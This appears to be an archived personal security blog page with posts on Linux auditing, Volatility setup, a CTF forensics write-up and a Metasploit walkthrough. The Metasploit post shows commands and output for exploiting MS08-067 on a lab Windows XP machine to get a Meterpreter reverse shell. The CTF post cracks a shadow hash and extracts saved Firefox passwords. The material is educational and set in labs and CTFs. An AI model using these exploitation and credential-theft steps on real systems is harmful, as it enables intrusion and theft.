Archive

Archive for the ‘Technical’ Category

Auditing File Events in Linux

December 29, 2014 Leave a comment

Audit Linux is an open source framework which monitors files/folders and provides useful accounting information whenever an event occurs. For example you can deploy the framework to detect policy violations in your company. The information which is logged provides a probative inference for forensic purpose . Audit linux is going to answer the following questions,

1. How can I track the changes when my file is modified?

2. How will I know which user in my computer accessed a file?

3. Which application program is used to access the file?

4. At what time a particular event happened?

5. Inode number and more.

Not only the above 4, it can also provides variety of information. Audit Linux is comprised of auditctl, ausearch, aureport, auditd, audispd, autrace, aulast, aulastlog, ausyslog, auvirt. But today we are going to see only the following the tools,

auditctl – This is a tool which is going to monitor all the events of a file we are interested.

ausearch – A tool which can be used to display the logged events

aureport – Prepares a brief report based on the collected logs.

To install the framework in Ubunt,

$ sudo apt-get install auditd audispd-plugins

This is how we usually monitor a file,


➜  ~ [255] sudo auditctl -w /home/h1dd3ntru7h/demo.txt -p rwxa -k pattern1


-p – if any reads/writes/executes/appending happens on the file demo.txt it will be logged. The -k flag can be used to uniquely identify the particular activity when there are too many log entries.

To see the applications which has accessed the file, we use ausearch. If you have setup log watching for multiple files, then you may leverage the -k flag, which can uniquely identify the logs of demo.txt file. You can also use like this  $ sudo ausearch -f demo.txt -k pattern1


➜  ~ [0] sudo ausearch -f  demo.txt
----
time->Sun Dec 28 20:01:41 2014
type=PATH msg=audit(1419777101.038:189): item=0 name="demo.txt" inode=2883912 dev=08:06 mode=0100664 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL
type=CWD msg=audit(1419777101.038:189):  cwd="/home/h1dd3ntru7h"
type=SYSCALL msg=audit(1419777101.038:189): arch=c000003e syscall=2 success=yes exit=3 a0=7fffd1b3978a a1=0 a2=1fffffffffff0000 a3=7fffd1b38b70 items=1 ppid=8610 pid=16233 auid=4294967295 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts1 ses=4294967295 comm="cat" exe="/bin/cat" key="pattern1"

i) uid=1000 is the user who accessed this file, here it is me. You can use the command id to see the user-name.

ii) tty=pts1 – If I am correct there are 7 controlling terminal in Linux (Ubuntu), which you can check using Ctrl+Alt+(F1 | F2 .. | F7). By default we log in tty1. Try opening the file from tty2, it will show tty’s value as tty2. Now, you may ask me, why the value of tty is not tty1|tty2..|tty7 instead of pts1..pts7. If you use a terminal then the value can be any of the tty’s. But when you use a Xterm terminal or a ssh terminal then the value would be either of any pts. If you have accessed the same file from another machine using ssh, the tty value will be from any of the seven controlling terminal. For example, below shows the tty value to be from a different console (pts6) when I displayed a file from another machine.


time->Sun Dec 28 23:34:44 2014
type=PATH msg=audit(1419789884.132:336): item=0 name="file.txt" inode=2883678 dev=08:06 mode=0100664 ouid=1000 ogid=1000 rdev=00:00 nametype=NORMAL
type=CWD msg=audit(1419789884.132:336):  cwd="/home/h1dd3ntru7h"
type=SYSCALL msg=audit(1419789884.132:336): arch=c000003e syscall=2 success=yes exit=3 a0=7fff68de3c3a a1=0 a2=1fffffffffff0000 a3=7fff68de1da0 items=1 ppid=21137 pid=21277 auid=1000 uid=1000 gid=1000 euid=1000 suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts6 ses=2 comm="cat" exe="/bin/cat" key="pattern2"

You can also check who is currently logged in your machine using the “last” command.

iii) audit(1419777101.038:189) == Sun Dec 28 20:14:18 IST 2014. The converted epoch time can be found above audit() or manually you can check using date command,


➜  ~ [0] date -d @1419777858.320
Sun Dec 28 20:14:18 IST 2014

iv) inode=2883912 : To get more information about the inode entry, you can give the inode number in debugfs tool,


➜  ~ [0] sudo debugfs /dev/sda6  #sda6 is where my / is mounted
debugfs 1.42.9 (4-Feb-2014)
debugfs:  stat <2883912> # inode entry for demo.txt

Inode: 2883912   Type: regular    Mode:  0600   Flags: 0x80000
Generation: 1756762240    Version: 0x00000000:00000001
User:  1000   Group:  1000   Size: 3811
File ACL: 0    Directory ACL: 0
Links: 1   Blockcount: 8
Fragment:  Address: 0    Number: 0    Size: 0
ctime: 0x54a01453:4085c294 -- Sun Dec 28 20:01:47 2014
atime: 0x54a01453:4085c294 -- Sun Dec 28 20:01:47 2014
mtime: 0x54a01453:4085c294 -- Sun Dec 28 20:01:47 2014
crtime: 0x54a01453:4085c294 -- Sun Dec 28 20:01:47 2014
Size of extra inode fields: 28
EXTENTS:
(0):11567128

Inode gives much more information now with 3 timestamps: Changed time, Modified time and Access time. If you delete the file, and then if you do the following then you can notice another time stamp dtime, which logs the time at which the file is deleted.

v) I guess rest are self explanatory. 🙂

If you append -i to ausearch then you can see the user-name(not user-id) as well as the system call name instead of the system call number.

➜  ~ [0] sudo ausearch -f demo.txt -i

type=PATH msg=audit(Sunday 28 December 2014 �@.320:220) : item=0 name=demo.txt inode=2883987 dev=08:06 mode=file,664 ouid=h1dd3ntru7h ogid=h1dd3ntru7h rdev=00:00 nametype=NORMAL
type=CWD msg=audit(Sunday 28 December 2014 �@.320:220) :  cwd=/home/h1dd3ntru7h
type=SYSCALL msg=audit(Sunday 28 December 2014 �@.320:220) : arch=x86_64 syscall=open success=yes exit=3 a0=0x7ffffae07cbf a1=O_RDONLY a2=0x1fffffffffff0000 a3=0x7ffffae05aa0 items=1 ppid=16673 pid=16886 auid=unset uid=h1dd3ntru7h gid=h1dd3ntru7h euid=h1dd3ntru7h suid=h1dd3ntru7h fsuid=h1dd3ntru7h egid=h1dd3ntru7h sgid=h1dd3ntru7h fsgid=h1dd3ntru7h tty=tty2 ses=unset comm=cat exe=/bin/cat key=pattern1

You can also find the logs using,


Process id : ➜  ~ [0] sudo ausearch -f demo.txt --pid 16886
User id : ➜  ~ [0] sudo ausearch -f demo.txt --uid h1dd3ntru7h
Using an application : ➜  ~ [0] sudo ausearch -f demo.txt -x cat

Some cool stuff that we can do using Audit LInux.

Login attempts : ➜  ~ [0] sudo aureport -i -au –success         |  –failure ( for failed attempts)

For a detailed report : ➜  ~ [1] sudo aureport

ECTF 2014 Forensics 400 Help Bob writeup

October 19, 2014 2 comments

This is the question,

Message from Bob:
Hello Hacker!
I am having troubles in finding the unique flag assigned to me.
Here are some files from my system.
Could you please help me out?

They gave us the etc, sbin, and home directories. When I saw the word “unique flag” many things were going in my mind! Can it be a ssh-private key? Is there something in linux which uniquely identifies every machine or an user within the etc file? Or is it the actual challenge file are they asking for! I didn’t understand! I asked the admin in the IRC to explain the term unique flag, but he refused to do so. Then I was pasting the strings whatever I found which was looking like a md5sum, but none of them worked! I left the challenge unsolved and started looking the others. I came back to solve this challenge around 10 pm. I had my team mates sitting next to me. I was asking him to read the question and tell me what he understood. Different people will have different approach towards a problem.

He  asked me to crack the user name’s password from the shadow file. Even I saw this in the morning but I didn’t think of cracking it since password cracking consumes more time and I am very lethargic to do that. Then I tried cracking the user name bob with JTR.

➜  etc [0] john shadow                                                                                                                                                                
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:09 99% 1/3 0g/s 302.2p/s 302.2c/s 302.2C/s b999991930..bob999991906
Phoenix1         (bob)
1g 0:00:00:24 100% 2/3 0.04084g/s 299.1p/s 299.1c/s 299.1C/s Phoenix1..Alice1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
    Yes we have cracked the password of bob. What to do next? This is where the question’s description lacked clarity. There is no clue from this step to move anywhere. But I saw the Firefox folder inside the etc directory. I wanted to be evil for sometime. I thought of cracking the user-names and passwords of all the user’s who has been used the same browser. Yes we can find them inside the profiles directory. Last year, I designed a challenge for InCTF on password acquisition from an outdated Firefox browser
    Whenever you log into your web accounts, firefox gives you an option to save the passwords. When you give “Remember password” firefox stores them in key3.db and in signons.sqlite file, which can be found from /home/user_name/.mozilla/firefox/blab.username. The stored passwords in these files are encrypted and decrypted using the key3.db file. signons.sqlite will contain the encrypted password using the key3.db file. Mostly the encryption mechanism is 3-DES and Bas64. If you can acquire these two files from any machine then you can crack the passwords which are stored inside. Now firefox has modified it’s security mechanism by adding a Master key, which gives you double protection. If you have configured the master key in your firefox browser, then even after getting the key3.db and signon.sqlite file from your machine, no one can easily find the username and password unless they have your master-key.
    So I took the “xk3nvgis.Bob” folder from the home folder of bob and tried cracking it using the Firefox Password Viewer. It didn’t work even after configuring everything. I don’t know if the user has set the master password. I don’t know what is the master password too! So I just tried giving the bob’s password ( “Phoenix1”) which I found after cracking the shadow file. Pingo! It worked! The user bob used his login password as his master key password.!
ECTF14_bob
You can see the username and password. Go to the URL and try logging in with the cracked credentials. I didn’t check the username given there. I used like this “bob@bob.com” and password “SEED MAJOR SMOKE WORK”.  Then I logged into the webiste. Looks like the actual contest portal but it is designed specifically for this challenge. When I went inside, I didn’t find anything to get the flag. All I saw only the home page of the ECTF website again.
ECTF15_bob_login
Then I remembered something which I did the same morning. I was going through the bash history and I noticed a wget command which downloads a file from the same website where we logged in currently.
➜  bob [0] cat .bash_history
ls -la
ls
ls -la
cd ../
ls
cd bob/
ls
ls -la
firefox
ls -la
wget http://ancient-citadel-9348.herokuapp.com/giff_flag
ls cd ../
cd bob/
vim ~/.bash_profile
cd Documents
I copy pasted the same URL in my browser where we logged in as bob. Then I got this!
ECTF15_bob_final
We pwned it after struggling a lot! Only very few teams including us solved this challenge. Hey, the message of the challenge is to use ** Master Key ** if you are using Firefox. Make sure that you are configuring the master key in your firefox browser. This is how it is configured, click here.

Exploiting Parsing Flaw in Windows using Metasploit

August 23, 2014 Leave a comment

In this article I am going to show you how to exploit the parsing flaw vulnerability in NetAPI32.dll using metasploit. You can normally see this module(the dll file) running in your task manager. Many application uses this module to access the Microsoft network.  This vulnerability is considered as one among the most critical one which was exploited in October 2008. The target machine was a Windows machine. This vulnerability can allow an attacker to execute arbitrary code in the target machine when exploited. You can read about this exploit from CVE 2008-4250 and also from here. The vulnerability is caused by the server service for not handling the crafted RPC requests properly. So will get started with setting up the environment. The host machine I am going to use is Linux and the target machine is a Windows XP Service pack 3.

Pre-requisites:

  1. Take a windows machine xp machine which is not patched. Boot it in a virtual machine. You can either use Virtualbox or Vmware
  2. Turn off your firewall in the windows machine.
  3. Make sure you are able to do bi-directional ping between host and guest machines.
  4. If you are not able to ping your target machine, then try removing iptable entries and check again.

msfconsol3

 

msfconsol4

Well bi-directional ping is working good. If you have any issues with the bi-directional ping in your machine, then let me know in the comments. I faced some issues before finishing the set up.  When everything goes good then start your metasploit framework from your host machine.


➜ ~ [0] sudo msfconsole
[sudo] password for h1dd3ntru7h:

msfconsole1

Now you need to search the exploit or you can directly copy paste the exploit in the next step.


msf exploit(ms08_067_netapi) > search netapi
[!] Database not connected or cache not built, using slow search

Matching Modules
================

Name Disclosure Date Rank Description
 ---- --------------- ---- -----------
 exploit/windows/smb/ms03_049_netapi 2003-11-11 good MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow
 exploit/windows/smb/ms06_040_netapi 2006-08-08 good MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
 exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow
 exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption

If you want to know more information about this exploit you can use the info command in the console. This will give you the CVE details, exploit description, supported OS service packs and also the reference links. Choose the last entry,


msf exploit(ms08_067_netapi) > use exploit/windows/smb/ms08_067_netapi

Now you need to specify the target machine’s IP address in the console. Set your target machine’s ip address to rhost.


msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Exploit target:

Id Name
-- ----
0 Automatic Targeting

msf exploit(ms08_067_netapi) > set rhost 10.30.11.245
rhost => 10.30.11.245

You are ready to pwn your target machine. Run exploit!


msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.30.9.73:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (769536 bytes) to 10.30.11.245
[*] Meterpreter session 1 opened (10.30.9.73:4444 -> 10.30.11.245:1054) at 2014-08-23 19:02:12 +0530

meterpreter >

That’s a successful exploit. Your target machine is now under your control. You can run arbitrary commands in the meterpreter shell. For example,


meterpreter > ifconfig

Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1

Interface 2
============
Name : AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC : 08:00:27:93:75:9c
MTU : 1500
IPv4 Address : 10.30.11.245
IPv4 Netmask : 255.255.252.0

meterpreter > 

I am going to read a text file named “secret_information.txt.txt” which is located in the target machine’s Desktop from the meterpreter shell.

msfconsole5


meterpreter > pwd
C:\WINDOWS\system32

meterpreter > cd ../../

meterpreter > cd Documents\ and\ Settings

meterpreter > ls

Listing: C:\Documents and Settings
==================================

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2014-03-06 12:13:24 +0530 .
40777/rwxrwxrwx 0 dir 1980-01-01 00:00:00 +0530 ..
40777/rwxrwxrwx 0 dir 2012-11-19 16:50:34 +0530 All Users
40777/rwxrwxrwx 0 dir 2012-11-19 18:37:48 +0530 Default User
40777/rwxrwxrwx 0 dir 2012-11-19 18:36:53 +0530 LocalService
40777/rwxrwxrwx 0 dir 2012-11-19 16:54:25 +0530 NetworkService
40777/rwxrwxrwx 0 dir 2014-08-10 19:31:19 +0530 h1dd3ntru7h

meterpreter > cd h1dd3ntru7h/Desktop

meterpreter > cat secret_information.txt.txt
He he I know you will exploit me! Fixme soon! Turn on the updates!

meterpreter >

Cool huh! Make sure you fix this vulnerability by turning on your windows updates. Will get back to you with a different exploit next time. Happy hacking!

Installing Linux Profile in Volatility

As I said, in my previous blog, it is necessary to note, that you need a compatible system profile to analyse a RAM memory dump.  That is, if you have a profile built for kernel 3.2.15, then you can only analyse the memory dump from a machine which runs the same kernel version 3.2.15. In case if you want to analyse some other kernel version’s RAM memory then you need to build a profile for the kernel version separately in your Volatility tool.  Before going to the building part, let me put it clearly what I meant by a profile. Actually it refers to a file ( a zip file ) where we compress the  kernel data structures and debug symbols. Volatility uses this zip file to mine critical information and to parse the objects inside the memory. In the next blog I will tell you the tools which you can use to collect the memory dumps from various OS’s and a demonstration with any one of a sample RAM memory dump. For now, I will tell you, how you can successfully build a Linux profile with your Volatility tool.

Determine your kernel version:

bios@bios-VirtualBox:~$ uname -mrs
Linux 3.13.0-24-generic x86_64

Installing a pre-requisite package:

bios@bios-VirtualBox:~$ sudo apt-get install dwarfdump

Creating vtypes:

Some of you might have encountered this issue while creating the vtypes.

h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux$ make
make -C //lib/modules/3.13.0-24-generic/build CONFIG_DEBUG_INFO=y M=/home/h1dd3ntru7h/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux modules
make[1]: Entering directory `/usr/src/linux-headers-3.13.0-24-generic’
  CC [M]  /home/h1dd3ntru7h/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux/module.o
/home/h1dd3ntru7h/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux/module.c:70:33: fatal error: linux/net_namespace.h: No such file or directory
 #include <linux/net_namespace.h>
                                 ^
compilation terminated.
make[2]: *** [/home/h1dd3ntru7h/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux/module.o] Error 1
make[1]: *** [_module_/home/h1dd3ntru7h/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.2/tools/linux] Error 2
make[1]: Leaving directory `/usr/src/linux-headers-3.13.0-24-generic’
make: *** [dwarf] Error 2

This is not the right way of doing this. Here is the solution, follow the steps properly.

bios@bios-VirtualBox:~/Desktop/volatility-2.3.1$ cd tools/linux

bios@bios-VirtualBox:~$ sudo chown -R bios Desktop/volatility-2.3.1/tools/linux/

 

Now make:

 

Now you should not get any errors at the end of the make.

bios@bios-VirtualBox:~/Desktop/volatility-2.3.1/tools/linux$ make

make -C //lib/modules/3.5.0-49-generic/build CONFIG_DEBUG_INFO=y M=/home/bios/Desktop/volatility-2.3.1/tools/linux modules

make[1]: Entering directory `/usr/src/linux-headers-3.5.0-49-generic’

CC [M] /home/bios/Desktop/volatility-2.3.1/tools/linux/module.o

Building modules, stage 2.

MODPOST 1 modules

CC /home/bios/Desktop/volatility-2.3.1/tools/linux/module.mod.o

LD [M] /home/bios/Desktop/volatility-2.3.1/tools/linux/module.ko

make[1]: Leaving directory `/usr/src/linux-headers-3.5.0-49-generic’

dwarfdump -di module.ko > module.dwarf

make -C //lib/modules/3.5.0-49-generic/build M=/home/bios/Desktop/volatility-2.3.1/tools/linux clean

make[1]: Entering directory `/usr/src/linux-headers-3.5.0-49-generic’

CLEAN /home/bios/Desktop/volatility-2.3.1/tools/linux/.tmp_versions

CLEAN /home/bios/Desktop/volatility-2.3.1/tools/linux/Module.symvers

make[1]: Leaving directory `/usr/src/linux-headers-3.5.0-49-generic’

 

Making the Profile:

 Go to the /boot directory and create a profile by zipping the kernel file.

bios@bios-VirtualBox:/boot$ ls -l

total 48888

-rw-r–r– 1 root root 848290 Jan 25 2013 abi-3.5.0-23-generic

-rw-r–r– 1 root root 853859 May 3 03:16 abi-3.5.0-49-generic

-rw-r–r– 1 root root 147880 Jan 25 2013 config-3.5.0-23-generic

-rw-r–r– 1 root root 148168 May 3 03:16 config-3.5.0-49-generic

drwxr-xr-x 3 root root 12288 May 22 10:42 grub

-rw-r–r– 1 root root 15543822 May 2 14:44 initrd.img-3.5.0-23-generic

-rw-r–r– 1 root root 15694176 May 22 10:42 initrd.img-3.5.0-49-generic

-rw-r–r– 1 root root 176764 Nov 27 2011 memtest86+.bin

-rw-r–r– 1 root root 178944 Nov 27 2011 memtest86+_multiboot.bin

-rw——- 1 root root 3023265 Jan 25 2013 System.map-3.5.0-23-generic

-rw——- 1 root root 3025898 May 3 03:16 System.map-3.5.0-49-generic

-rw-r–r– 1 root root 5189248 Aug 2 2013 vmlinuz-3.5.0-23-generic

-rw——- 1 root root 5191616 May 3 03:16 vmlinuz-3.5.0-49-generic

bios@bios-VirtualBox:~$ sudo zip Desktop/volatility-2.3.1/volatility/plugins/overlays/linux/ubuntu-12.04-amd64_3.5.0-49-generic.zip Desktop/volatility-2.3.1/tools/linux/module.dwarf /boot/System.map-3.5.0-49-generic

updating: Desktop/volatility-2.3.1/tools/linux/module.dwarf (deflated 90%)

adding: boot/System.map-3.5.0-49-generic (deflated 79%)

 

Checking the installation:

 

If everything goes smooth without any error then you are done with creating Linux profile. Hurray! Now you can check, whether everything went in your way!

h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.3.1$ vol3 –info | grep “linux”

Volatility Foundation Volatility Framework 2.3.1

linux_arp – Print the ARP table

linux_banner – Prints the Linux banner information

linux_bash – Recover bash history from bash process memory

linux_check_afinfo – Verifies the operation function pointers of network protocols

linux_check_creds – Checks if any processes are sharing credential structures

linux_check_evt_arm – Checks the Exception Vector Table to look for syscall table hooking

linux_check_fop – Check file operation structures for rootkit modifications

linux_check_idt – Checks if the IDT has been altered

[stripped]

You could see the plugins listed out, which confirms the building the linux profile.

 

Checking for the Linux profile version:

 

h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.3.1$ vol3 –info | grep “Linux”

Volatility Foundation Volatility Framework 2.3.1

linux_banner – Prints the Linux banner information

linux_yarascan – A shell in the Linux memory image

LinuxUbuntu1204x64 – A Profile for Linux Ubuntu1204 x64

Linuxubuntu-14_04-desktop-amd64_3_13_0-24-genericx64 – A Profile for Linux ubuntu-14.04-desktop-amd64_3.13.0-24-generic x64

If you face any issues while building the Linux Profile, will help you out in fixing it. Let me know through the comments.

Installing Volatility in Ubuntu

May 22, 2014 1 comment

Volatility is a memory forensics framework, to analyse ram memory dumps for Windows, Linux, and Mac. In order to analyse a operating system’s RAM memory in Volatility, you need to build the corresponding operating system’s profile. By default the Windows profile is built inside Volatility. Other than Windows, if you are analysing a Linux or a Mac memory dump, then you have to build the profiles accordingly. Most important thing to note is, you cannot build a profile for a Ubuntu 3.13 system to analyse a memory dump from Ubuntu 3.10 system. In this article, I am going to show you how you can install volatility in your machine and in the next blog I will show you how to create linux profiles to analyse Linux based RAM memory. Please see, I am using Ubuntu 12.04, amd_64. Also, install the packages in the order which is followed before. Make sure that there are no errors appearing while installing the dependencies and libraries.

[Update] You can also refer to Volatility’s github for the latest updates about dependencies.

Step 1: Installing dependencies

h1dd3ntru7h@bi0s:~$ sudo apt-get install subversion pcregrep libpcre++-dev python-dev -y

Step 2: Installing PyCrypto

You can either use pip to install the library or you can download the source from here and install.

h1dd3ntru7h@bi0s:~/Apps$ tar -zxvf pycrypto-2.6.1.tar.gz

h1dd3ntru7h@bi0s:~/Apps/pycrypto-2.6.1$ python  setup.py build

h1dd3ntru7h@bi0s:~/Apps/pycrypto-2.6.1$ sudo python setup.py build install

Step 3: Installing Distrom

Distrom is a disassemble library for x86/AMD64. You can download the source from here.

h1dd3ntru7h@bi0s:~/Apps/distorm3$ unzip distorm3.zip

h1dd3ntru7h@bi0s:~/Apps$ cd distorm3/

h1dd3ntru7h@bi0s:~/Apps/distorm3$ python setup.py build

h1dd3ntru7h@bi0s:~/Apps/distorm3$ python setup.py build install

Step 4: Installing Yara

Volatility supports many plugins which helps to identify malwares from memory dumps. Many plugins which are based on malwares uses Yara library. You can download the recent version availabe, but for this demo I am using the older version of the yara.

h1dd3ntru7h@bi0s:~/Apps$ wget http://yara-project.googlecode.com/files/yara-1.4.tar.gz

h1dd3ntru7h@bi0s:~/Apps$tar -zxvf yara-1.4.tar.gz

h1dd3ntru7h@bi0s:~/Apps$ cd yara-1.4/
h1dd3ntru7h@bi0s:~/Apps/yara-1.4$ sudo ./configure

h1dd3ntru7h@bi0s:~/Apps/yara-1.4$ sudo make

h1dd3ntru7h@bi0s:~/Apps/yara-1.4$ sudo make install

Step 5: Installing Yara Python

Please follow the instructions in Step 4 before installing Yara Python. You can download the Yara Python1.4a source from here. Please see, if you downloaded a different version of Yara in step 4, then do download a compatible version of Yara Python.

h1dd3ntru7h@bi0s:~/Apps$ tar -zxvf yara-python-1.4a.tar.gz

h1dd3ntru7h@bi0s:~/Apps$ cd yara-python-1.4a/

h1dd3ntru7h@bi0s:~/Apps/yara-python-1.4a$ python setup.py build

h1dd3ntru7h@bi0s:~/Apps/yara-python-1.4a$ python setup.py build install

h1dd3ntru7h@bi0s:~/Apps/yara-python-1.4a$ echo “/usr/local/lib” >> /etc/ld.so.conf
h1dd3ntru7h@bi0s:~/Apps/yara-python-1.4a$ ldconfig

We are done with installing the dependencies, now  will install the Volatility framework. Please download the source from here. You can download and use it wherever you want. Once after downloading, extract to a directory.

h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.3.1$ python setup.py build

h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.3.1$ python setup.py build install

This will complete the installation and if everything went in the right way, then you should get a similar stdout,

h1dd3ntru7h@bi0s:~/Desktop/F0r3ns1c5/Memory_Forensics/New/volatility-2.3.1$ python vol.py -h
Volatility Foundation Volatility Framework 2.3.1
Usage: Volatility – A memory forensics analysis platform.

Options:
  -h, –help            list all available options and their default values.
                        Default values may be set in the configuration file
                        (/etc/volatilityrc)
  –conf-file=/home/h1dd3ntru7h/.volatilityrc
[stripped]

InCTF 2014 – National Level Ethical Hacking contest

January 28, 2014 1 comment

InCTF_header

Not a day passes when several machines are compromised and infections spread rampantly in the world today. The cyber world has witnessed several dangerous attacks including the Stuxnet virus and it’s successor Duqu. Other recent attacks include the Flame malware, which managed to disguise itself as a legitimate Windows software. It exploited a bug in Windows to obtain a certificate which allowed itself to authenticate itself as genuine Windows software. Other notable examples include rise of botnets such as the highly resilient Zeus banking trojan and the Conficker worm. There have also been instances of espionage by government agencies on one another such as the recent incident where Georgia CERT discovered a Russian hacker spying on them.

Indian websites offer little or no resistance to such security incidents. The Computer Emergency Response Team, India(Cert-In) has been tracking defacements of Indian websites amongst other security incidents. Their monthly and annual bulletins detail the various vulnerabilities and malware infections in various Indian websites. It’s really sad that with so much talent and skill, Indian websites are compromised frequently and nothing can be done to stand this wave of attacks on them.

InCTF is a Capture the Flag style ethical hacking contest, a strategic war-game designed to mimic the real world security challenges. Software developers in India have little exposure to secure coding practices and the effects of not adopting such practices-one of the main reasons why systems are compromised quite easily these. Following such simple practices can help prevent such incidents.

InCTF ‘14 is from December 2013 to March 2014 and is focused exclusively on the student community. No prior exposure or experience in cyber security needed to participate.

What you need to do?
1. Form a team (minimum three and maximum five members from your college)
2. Approach a faculty/mentor and request him/her to mentor your team
3. Register online at http://portal.inctf.in

Great Rewards:
20K – The winning team receives a cash prize of up to Rs. 20000/-
15K – The first runner-up team receives a cash prize of up to Rs. 15000/-
10K – The second runner-up team receives a cash prize of up to Rs. 10000/-

See Prizes for more.
Note

  • Teams are awarded prizes based on their performance
  • Deserving teams are well awarded. Exciting prizes to be won.

So, what are you waiting for? It’s simple: Register, Learn, Hack!
Keep up with us
Website | Email | Facebook | Twitter | Mailing List | IRC | Google+ |

*Cash prizes are subject to their performance and participation in the CTF round. Only teams who connect to the VPN server and successfully gain points in the CTF round are eligible for prizes. In addition, cash prize winners of previous editions of InCTF and sCTF are not eligible for prizes this time. Prizes will be awarded only if all members of the team are not in final year of their education. The decision of Team InCTF is final.

Internal and External Commands

January 12, 2013 Leave a comment

Internal Commands:

As part of my OS Security Course, we had an assignment about differentiating Internal  and External commands in Linux. Internal commands are those which are built inside the shell, i.e they are already loaded into the system. It is directly executed in the system. They don’t require a separate process to execute them. They are PATH independent and they are not coded in files. PATH is represented as “$PATH”,  and it is an environment variable that tells the shell, which directories to search for executables, which are provided by the user. Just type and check, $PATH and env in your terminal. Oh…. btw env is an 32-bit LSB executable file, where we can see a list of current environmental variables, and their values for the current user. “env” file can be found in /usr/bin directory. We can locate the PATH variable inside the env executable by using grep command and with a pipe.


shankie@ubuntu:~/Desktop$ env | grep "$PATH"
PATH=/usr/lib/lightdm/lightdm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games

OK coming back to the topic, in Linux we can differentiate the Linux commands, using the type command. If it is an internal command, type command will pop a message, that it is shell built-in. Else it will mention the directory of the command, i.e the directory where the executable is located.

shankie@ubuntu:~/Desktop$ type cd
cd is a shell builtin

External commands are not executed directly in the system. More clearly they are not loaded into the system. For Eg. cat, ifconfig, firefox( if installed) .They will have an individual process. They seek the help of the $PATH variable. Usually, normal linux commands are found in /bin or in /sbin. If the path of a particular command provided by the user is not mentioned in the variable means, it won’t be executed.

shankie@ubuntu:~/Desktop$ type ifconfig
ifconfig is hashed (/sbin/ifconfig)
shankie@ubuntu:~/Desktop$ type cat
cat is hashed (/bin/cat)
shankie@ubuntu:~/Desktop$ type firefox
firefox is /usr/bin/firefox

So this is the assignment, implemented in Python, HOPE IT IS COMPLETE NOW! given a list of terminal commands, which sorts the terminal commands issued by the user, based on internal and external commands and executes the terminal commands. You can also download the below code with a Sample Input from my Repository.


#!/usr/bin/python

'''
Variable Descriptions:

List:
commands ( Terminal commands issued by the User )
final ( STDOUT of the terminal commands, issued by user )

'''

#Header File
import os

# User Input
commands,final = [],[]
no = input("Enter the number of commands:")
for i in range(no):
    commands.append(raw_input("Enter the commands:"))

# STDOUT READER
for i in range(no):
    dif = 'type '
    temp = commands[i]
    temp = dif+temp
    output = os.popen(temp).readlines()
    final.append(output)

# Special Case: Directory execution
def SHELL(catch):

#Generalization of Getting HOME DIR
    path = '/home/shankie'
    path = 'env|grep "HOME"'
    path = os.popen(path).readlines()
    path = str(path)
    end  = path.find('\\n')
    path = '/' + path[8:end]

# Normal Commands Other Than CD
if 'cd' not in catch:
    os.system(catch)

# Moving Forward
else:
    if len(catch) == 2:
        os.chdir(path)
        print "Your Directory is Changed! Select a option!"
        print "1. List the files and Subdirectory"
        print "2. Print the Path"
        catch = input()
        if catch == 1:
            os.system('ls')
        elif catch == 2:
            os.system('pwd')
        else:
            print "Wrong Option"

# Moving Backward
    else:
        strip = catch[3:]
        os.chdir(strip)
        print "Your Directory has Changed! Now you are inside the path!"
        os.system("pwd")

# Classifying Internal or External Command
i=0
while i < no:
    temp = str(final[i])
    index = temp.find('shell')
    if index > 0:
        print commands[i]+ ' is Internal Command'
    else:
        print commands[i]+ ' is External Command'
    temp = commands[i]
    SHELL(temp)
    i+=1

bi0s

CTF | Amrita

Thoughts - always free of cost !!

Simple words gr8 thoughts ...

RAM Slack - Random Thoughts from a Computer Forensic Examiner

Random Thoughts from a Computer Forensic Examiner

InCTF

behind the scenes

DFIR Journal

Trials and Tribulations of a DFIR life

I dont know zilch !

For the noobs out there like me

X-Ways Forensics Practitioner's Guide

The Guide to X-Ways Forensics!

Forensic Focus - Articles

Digital forensics articles and research papers

my abbreviations......

gain,learn and share knowledge!!!!

digirati82

Windows Logging Service (WLS), DFIR, etc.

Belkasoft Forensic: The Digital Evidence Blog

Searching for, analyzing and recovering digital evidence

Gail Tredwell. Amma. Truth. Lies. Scandals. Fraud. And. Reality

Three things cannot be long hidden: the sun, the moon, and the truth.

Integriography: A Journal of Broken Locks, Ethics, and Computer Forensics

